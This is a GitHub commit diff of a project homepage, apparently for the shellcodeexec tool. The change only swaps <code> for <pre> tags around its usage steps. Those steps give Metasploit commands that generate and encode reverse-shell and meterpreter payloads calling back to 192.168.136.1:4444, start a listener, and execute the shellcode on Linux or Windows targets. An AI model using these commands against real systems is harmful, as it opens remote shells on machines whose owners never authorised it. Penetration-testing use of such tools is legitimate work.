Skip to content

Commit 67dfaf9

Browse files
committed
minor adjustments to homepage
1 parent fe6df10 commit 67dfaf9

1 file changed

Lines changed: 13 additions & 13 deletions

File tree

index.html

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -74,31 +74,31 @@ <h2>Features</h2>
7474

7575
<ol>
7676
<li>Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
77-
<code>
77+
<pre>
7878
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
79-
</code>
79+
</pre>
8080
Or for a Windows target:
81-
<code>
81+
<pre>
8282
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
83-
</code>
83+
</pre>
8484
</li>
8585
<li>Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
86-
<code>
86+
<pre>
8787
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
88-
</code>
88+
</pre>
8989
Or for a Windows target:
90-
<code>
90+
<pre>
9191
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
92-
</code>
92+
</pre>
9393
</li>
9494
<li>Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
95-
<code>
95+
<pre>
9696
$ ./shellcodeexec &lt;msfencode's alphanumeric-encoded payload&gt;
97-
</code>
97+
</pre>
9898
Or, on the Windows target:
99-
<code>
99+
<pre>
100100
C:\WINDOWS\Temp&gt;shellcodeexec.exe &lt;msfencode's alphanumeric-encoded payload&gt;
101-
</code>
101+
</pre>
102102
</li>
103103
</ol><h2>License</h2>
104104

@@ -123,4 +123,4 @@ <h2>Features</h2>
123123
</script>
124124

125125
</body>
126-
</html>
126+
</html>

0 commit comments

Comments
 (0)